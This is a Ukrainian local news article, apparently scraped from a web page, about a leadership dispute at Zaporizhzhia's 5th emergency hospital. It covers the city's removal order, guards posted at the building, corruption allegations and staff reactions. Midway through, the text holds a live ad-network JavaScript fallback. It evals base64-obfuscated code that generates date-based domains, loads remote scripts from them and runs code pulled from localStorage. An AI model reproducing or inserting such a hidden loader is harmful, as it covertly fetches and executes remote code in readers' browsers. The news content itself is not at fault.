У 5-й лікарні Запоріжжя майже дійшли до «барикад»: боротьба за посаду головлікаря триває (ФОТО, ВІДЕО)

У міській клініці екстреної та швидкої допомоги продовужується напружена ситуація довкола посади директора лікарні.

Що відбувалося у провідному медичному закладі Запоріжжя останніми днями, та які позиції сторін, розбирався Акцент.

Як раніше повідомляв Акцент, 28 лютого, в.о. міського голови Запоріжжя Анатолій Куртєв видав розпорядження про тимчасове усунення від займаної посади директора лікарні Дмитра Івченка і призначення на його посаду медичного директора Петра Риженка. Одночасно з цим, Івченко в той же день видав власне розпорядження про усунення Риженка із займаної ним посади медичного директора. З того часу продовжується боротьба між двома групами.

В останні дні Петро Риженко за допомогою оперативно-рятувальної служби «Кобра» та поліції заходив до кабінету Дмитра Івченка. Але зазвичай його вже там чекав головний лікар разом з медиками, що його підтримують. Також останніми днями, за інформацією Акцента, в лікарні зачиняли адмінбудвлю та двері в окремих коридорах медзакладу. «Так скоро до барикад дійде», — каже нам один з працівників закладу. Крім того, «Кобра» практично цілодово чергує біля лікарні.

Оперативно-рятувальна служба майже цілодобово чергує біля 5-ї лікарні Позиції сторін — міської влади та адміністрації Дмитра Івченкоа

Ми звернулися за коментарем до заступника міського голови Запоріжжя Анатолія Васюка. На його думку, Івченко перебуває на посаді незаконно.

«Після перевірки комісією міської ради діяльності Дмитра Івченко на посаді головного лікаря 5-ї міської лікарні екстреної та швидкої медичної допомоги, було складено 18 актів про корупцію. Зокрема, виявилося, що посадові особи лікарні регулярно виписували собі премії на десятки тисяч гривень на місяць. Ці документи передані в суд. Зараз на території лікарні Івченко перебуває незаконно, адже своїм розпорядженням в.о.міського голови відсторонив його від службових обов’язків. Відсторонений директор провокує конфліктні ситуації з новим очільником лікарні. Всі ці випадки фіксуються, викликається поліція. Зараз у судових інстанціях розглядається справа по заяві Івченко. У забезпеченні позову і припиненні дії розпорядження в.о.міського голови до винесення вироку суд вже Івченко відмовив. Також по цій ситуації будуть відкриватися кримінальні справи», зазначив в коментарі для Акценту Васюк.

Ми також звернулися за коментарем до юридичного відділу 5-ї лікарні. Нажаль поки нової відповіді нам не надали. Тому публікуємо їх позицію тижневої давнини. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

На думку юристів команди Дмитра Івченка розпорядження Куртєва є незаконним. Адже за їхнім трактуванням згідно статті 65 прим. 1 закону України про запобігання коррупції частині 5 ,абзацу 3 — відстороняти від роботи має право безпосередньо керівник особи, яка працює на даному підприємстві. Відповідно до контракту між директором і мером міста, і відповідно прав міського голови, відсутні повноваження секретаря міської ради, щодо відсторонення або звільнення від роботи директора. Директор КНП призначається або звільняється з посади шляхом голосування, чого не відбулось та не відбувалось в даному випадку по призначенню Риженка та відстороненню Івченка.

Минулої п’ятниці відбулася сесія Запорізької міьскої ради. Але там депутатами не розглядалося питання відсторонення Дмитра Івченка з посади головного лікаря. Хоча будь-яке рішення депутатів (підтримка відсторонення Івченка чи ні) розв’язала би цей конфлікт.

Що кажуть у колективі 5-ї лікарні

Журналісти Акцента поспілкувалися з деякими спіробітниками 5-ї лікарні. Найбліьше, що засмучує медиків — сам конфлікт, що шкодить іміджу медичного закладу.

«Адже коли лікарню перетворюють фактично на барикади — це аж ніяк не сприяє роботі колективу. «Кобра» має рятувати людей, а не забезпечувати «крісла «керівникам», — каже ще один з лікарів медзакладу.

В лікарні є ті, хто підтримує Дмитра Івченка. Є і ті, хто виступає проти нього і відповідно за нове керівництво. Але більшість колективу, на думку наших спірозмовників, активно не підтримують жодну зі сторін.

Акцент слідкуватиме за розвитком ситуації. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/u-5-j-likarni-zaporizhzhya-majzhe-dijshli-do-barikad-borotba-za-posadu-golovlikarya-trivaye-foto-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top